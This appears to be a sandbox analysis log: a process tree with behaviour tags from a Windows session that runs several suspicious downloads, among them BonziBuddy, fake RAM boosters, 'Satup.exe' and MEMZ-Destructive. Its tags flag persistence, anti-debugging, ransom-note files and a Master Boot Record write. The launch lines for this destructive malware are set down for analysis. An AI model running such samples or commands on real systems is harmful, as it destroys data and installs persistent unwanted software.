"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.119.1292991961\198052234" -childID 116 -isForBrowser -prefsHandle 8132 -prefMapHandle 6804 -prefsLen 31121 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88d37aaf-1088-46d9-9932-3ed0e54b2c6f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6896 145dd572d58 tab
3⤵
PID:4060

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.120.888508254\773260449" -childID 117 -isForBrowser -prefsHandle 7592 -prefMapHandle 11096 -prefsLen 31121 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c01e20b9-4956-48e3-a26d-ef75badf2c29} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5976 145e1803b58 tab
3⤵
PID:864

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.122.688679240\509791119" -childID 119 -isForBrowser -prefsHandle 10440 -prefMapHandle 2676 -prefsLen 31121 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7dedca3c-e5f0-4b92-8382-7aebd03ec468} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5952 145e4625058 tab
3⤵
PID:3908

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.121.2124177618\1719809044" -childID 118 -isForBrowser -prefsHandle 7300 -prefMapHandle 4216 -prefsLen 31121 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {580c7f7a-78b2-43ce-a62c-d4b01249e913} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10356 145e4624d58 tab
3⤵
PID:4116

C:\Users\Admin\Downloads\RamBooster20.exe
"C:\Users\Admin\Downloads\RamBooster20.exe"
3⤵
PID:5448

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.123.571429326\1767194359" -childID 120 -isForBrowser -prefsHandle 7176 -prefMapHandle 7804 -prefsLen 31130 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85189b6d-2367-4c54-904c-d9f48b6cadd7} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7604 145d21b9258 tab
3⤵
PID:6884

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.124.548185870\268287808" -childID 121 -isForBrowser -prefsHandle 7804 -prefMapHandle 7176 -prefsLen 31130 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a789a0e-91b9-487e-8f78-db33f5c1afc4} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5416 145e4331258 tab
3⤵
PID:6756

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.125.5775967\1410673273" -childID 122 -isForBrowser -prefsHandle 5116 -prefMapHandle 8232 -prefsLen 31130 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c9ebdf7-8168-4cb3-8122-1a4073889c5b} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6492 145e4333058 tab
3⤵
PID:6272

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.126.1100150503\2145040520" -childID 123 -isForBrowser -prefsHandle 5116 -prefMapHandle 4884 -prefsLen 31130 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fca78a07-191f-4983-a181-012d7a1d1957} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7788 145e031c158 tab
3⤵
PID:6740

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.127.2145749925\1903661806" -childID 124 -isForBrowser -prefsHandle 7640 -prefMapHandle 5016 -prefsLen 31130 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d80aea0e-4bff-4622-a07c-2564ddd5c55c} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5368 145e298c158 tab
3⤵
PID:3904

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.128.983133008\1902232477" -childID 125 -isForBrowser -prefsHandle 7248 -prefMapHandle 10468 -prefsLen 31130 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3f2c6fe-c92e-4113-a70d-d061d3ed8486} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6704 145df897858 tab
3⤵
PID:3952

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.130.908911145\75095756" -childID 127 -isForBrowser -prefsHandle 4268 -prefMapHandle 6504 -prefsLen 31130 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59fa866f-ca6d-4a3d-965c-65b407d185eb} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8280 145e4e94258 tab
3⤵
PID:2604

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.129.1413891504\1728547836" -childID 126 -isForBrowser -prefsHandle 8332 -prefMapHandle 5164 -prefsLen 31130 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fae1d190-94b0-4adb-a7ce-997d43c9592d} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4652 145e4e93f58 tab
3⤵
PID:4536

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.131.1756857449\1511474334" -childID 128 -isForBrowser -prefsHandle 9256 -prefMapHandle 8844 -prefsLen 31130 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ea9a716-9f46-491a-95a6-8bf55ac1959c} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8648 145e5c1c558 tab
3⤵
PID:6568

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x434 0x4ec
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3448

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3228

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5368

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2777:112:7zEvent32557
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:404

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:1152

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap8990:86:7zEvent16796
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2464

C:\Users\Admin\Downloads\Satup.exe
"C:\Users\Admin\Downloads\Satup.exe"
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4776

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Keygen.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3520

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Read.Me.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4124

C:\Users\Admin\Downloads\Satup.exe
"C:\Users\Admin\Downloads\Satup.exe"
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5968

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap25350:114:7zEvent1203
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2108

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap25748:76:7zEvent11810
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3272

C:\Users\Admin\Downloads\zsdfvrtuipojmnfgd.exe
"C:\Users\Admin\Downloads\zsdfvrtuipojmnfgd.exe"
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6116

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6812

C:\Windows\System32\xnqxj1.exe
"C:\Windows\System32\xnqxj1.exe"
1⤵
PID:6656

C:\Program Files (x86)\RamBooster 2.0\Rambooster.exe
"C:\Program Files (x86)\RamBooster 2.0\Rambooster.exe"
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5432

C:\Users\Admin\AppData\Local\Temp\Temp1_framxpro.zip\Install FreeRAM XP Pro 1.52.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_framxpro.zip\Install FreeRAM XP Pro 1.52.exe"
1⤵
PID:7156

C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe
"C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6304

C:\Users\Admin\AppData\Local\Temp\Temp1_Bonzi.zip\BonziBuddy432.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Bonzi.zip\BonziBuddy432.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:3448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat" "
2⤵
PID:6264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://bonzibuddy.tk/
2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa62b346f8,0x7ffa62b34708,0x7ffa62b34718
3⤵
PID:5008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
3⤵
PID:3232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 /prefetch:3
3⤵
PID:4976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
3⤵
PID:3496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
3⤵
PID:6368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
3⤵
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
3⤵
PID:6176

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
PID:3732

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7975d5460,0x7ff7975d5470,0x7ff7975d5480
4⤵
PID:6160

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
3⤵
PID:668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
3⤵
PID:7388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
3⤵
PID:7380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:1
3⤵
PID:7644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
3⤵
PID:7660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
3⤵
PID:7652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:1
3⤵
PID:7636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
3⤵
PID:7628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
3⤵
PID:7620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
3⤵
PID:7576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
3⤵
PID:7568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
3⤵
PID:7560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9318220324924298637,16206543259772395948,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
3⤵
PID:7552

C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXE
MSAGENT.EXE
1⤵
- Modifies Installed Components in the registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:996

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentCtl.dll"
2⤵
- Loads dropped DLL
- Modifies registry class
PID:4396

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentDPv.dll"
2⤵
- Loads dropped DLL
PID:1444

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentDP2.dll"
2⤵
- Loads dropped DLL
- Modifies registry class
PID:4824

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentMPx.dll"
2⤵
- Loads dropped DLL
- Modifies registry class
PID:4092

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentSR.dll"
2⤵
- Loads dropped DLL
PID:7116

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentPsh.dll"
2⤵
- Loads dropped DLL
PID:5204

C:\Windows\msagent\AgentSvr.exe
"C:\Windows\msagent\AgentSvr.exe" /regserver
2⤵
- Executes dropped EXE
- Modifies registry class
PID:6772

C:\Windows\SysWOW64\grpconv.exe
grpconv.exe -o
2⤵
PID:6472

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\mslwvtts.dll"
2⤵
- Loads dropped DLL
PID:3976

C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe
tv_enua.exe
1⤵
- Modifies Installed Components in the registry
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
PID:6752

C:\Windows\SysWOW64\grpconv.exe
grpconv.exe -o
2⤵
PID:6968

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll
2⤵
- Loads dropped DLL
PID:5484

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll
2⤵
- Loads dropped DLL
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:6968

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6160

C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe"
1⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe" /watchdog
2⤵
PID:7192

C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe" /watchdog
2⤵
PID:7248

C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe" /watchdog
2⤵
PID:7236

C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe" /watchdog
2⤵
PID:7156

C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe" /watchdog
2⤵
PID:7284

C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_memz-master.zip\MEMZ-master\MEMZ-Destructive.exe" /main
2⤵
- Writes to the Master Boot Record (MBR)
PID:5712

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" \note.txt
3⤵
PID:6308

C:\Windows\SysWOW64\calc.exe
"C:\Windows\System32\calc.exe"
3⤵
PID:536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://pcoptimizerpro.com/
3⤵
PID:652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa62b346f8,0x7ffa62b34708,0x7ffa62b34718
4⤵
PID:6712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,856424669554753701,17206725217765025245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
4⤵
PID:3104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
